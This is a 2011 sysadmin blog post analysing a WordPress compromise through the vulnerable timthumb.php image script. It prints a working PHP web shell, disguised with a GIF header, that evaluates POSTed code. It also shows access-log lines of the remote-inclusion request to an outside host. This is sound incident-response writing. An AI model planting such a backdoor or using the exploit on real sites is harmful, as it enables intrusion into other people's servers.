Header RSS Feed
 
If you only want to see the articles of a certain category, please click on the desired category below:
ALL Android Backup BSD Database Hacks Hardware Internet Linux Mail MySQL Monitoring Network Personal PHP Proxy Shell Solaris Unix Virtualization VMware Windows Wyse

Wordpress timthumb hack - a short story
Wednesday - Nov 9th 2011 - by - (0 comments)

And the cat and mouse game goes on and on...
As I already wrote in another post 'On a hacker's trail', it's always the same story: Admin (tries) to secure system as much as possible, hackers (might) come in, admin finds hacker and fixes vulnerability, hackers (might) find other vulnerabilities.... and so on. At least it keeps me busy ;-).

This time I stumbled over a Wordpress hack which is known since August 2011 (after some research I found that information). The first hint were exceptionally many POST entries in the access log file of a virtual host. So I checked which files were created via browser (therefore uid of Apache):

# for file in $(find . -user www-data | grep .php)
> do
> ls -l $file
> done
-rw-r--r-- 1 www-data www-data 431 2011-08-06 10:41 ./critics/wp-admin/upd.php
-rw-r--r-- 1 www-data www-data 4 2011-08-05 17:45 ./critics/wp-content/themes/InReview/cache/external_9cb702aa084691e66c789c1e98d6233a.php
-rw-r--r-- 1 www-data www-data 431 2011-08-06 10:41 ./critics/wp-content/upd.php
-rw-r--r-- 1 www-data www-data 1.6K 2011-08-21 19:39 ./photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php
-rw-r--r-- 1 www-data www-data 887 2011-10-07 20:04 ./photo/wp-content/themes/DeepFocus/cache/a31844cea72ed6c9f90b56b039bbf3f5.php
-rw-r--r-- 1 www-data www-data 15K 2011-07-20 10:59 ./photo/wp-content/w3-total-cache-config.php

There were some more files but I left out session files.

After taking a closer look at some files, I came across external_ed59d62e1b1e2167275feed65b374079.php which showed an interesting content:

# more ./photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php
GIF89a4+3f3333f333ff3fffff3...
                                                                          ص
`%bҼ#r7:A\kmФG^L                               V~dZTj
Bjore--(58%)

  
rew
       i7kG<*<)nglpRMy#R/AuII2<~ohOuY㬧f»-'nMSIV_5Ve@'URVAQcp4XYvPuV^R|xxH2
                       V     gUI
@q_dbYdnwM9i<a[il%GIfmVS-)$`{Qmd浨L-g^ESY~FסVfMJ\yꭸ*
@YԥyAP*WI2!$9šc5A35D&P;<?php                                   VZZ]ihF J)^W] Ӯ
if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){$Um51?u%5V`
$cmd = $_POST["code"];
eval (stripslashes($cmd));
}
?>

The file starts with binary code, as if it tries to 'hide' as a non-text file, so a correct grep cannot be executed on that file:

# grep -r "eval (stripslashes" *
Binary file photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php matches

But even more interesting is the fact what happens after the binary part. The php file expects a variable '$key' via POST method. If the md5 hash of the given 'key' variable matches, then a second variable '$cmd' (also submitted by POST) will be executed on the system.

OK, so far I knew this file doesn't belong to Wordpress and it's dangerous. But how did it come on the system?

Let's take a look in the Apache logs what happened on August 21st at around 19:39 when the file was created/modified:

91.224.160.182 - - [21/Aug/2011:19:38:58 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/thumb.php?src=http://blogger.com.bloggera.net/images.php HTTP/1.1" 404 22638 "" "Opera/9.80 (Windows NT 6.
1; U; en) Presto/2.6.30 Version/10.62"

91.224.160.182 - - [21/Aug/2011:19:38:58 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/timthumb.php?src=http://blogger.com.bloggera.net/images.php HTTP/1.1" 200 10557 "" "Opera/9.80 (Windows NT
 6.1; U; en) Presto/2.6.30 Version/10.62"

The hacker first tried to use thumb.php - but this file doesn't exist. On the second try he was successful by using timthumb.php, a php script to upload images which obviously is vulnerable.

So this is the source and this needs to be fixed.

This hack was first discovered by Mark Maunder on August 1st 2011 and he explains in a very good article how it was possible to use timthumb.php (very easy in fact!):
http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/

Another good article can be found on the following page: http://pinchii.com/home/2011/08/hack-attempt-on-pinchii-com

 

Add a comment

Show form to leave a comment

Comments (newest first):

No comments yet.

Go to Homepage home
Linux Howtos how to's
Monitoring Plugins monitoring plugins
Links links

Valid HTML 4.01 Transitional
Valid CSS!
[Valid RSS]

7423 Days
until Death of Computers
Why?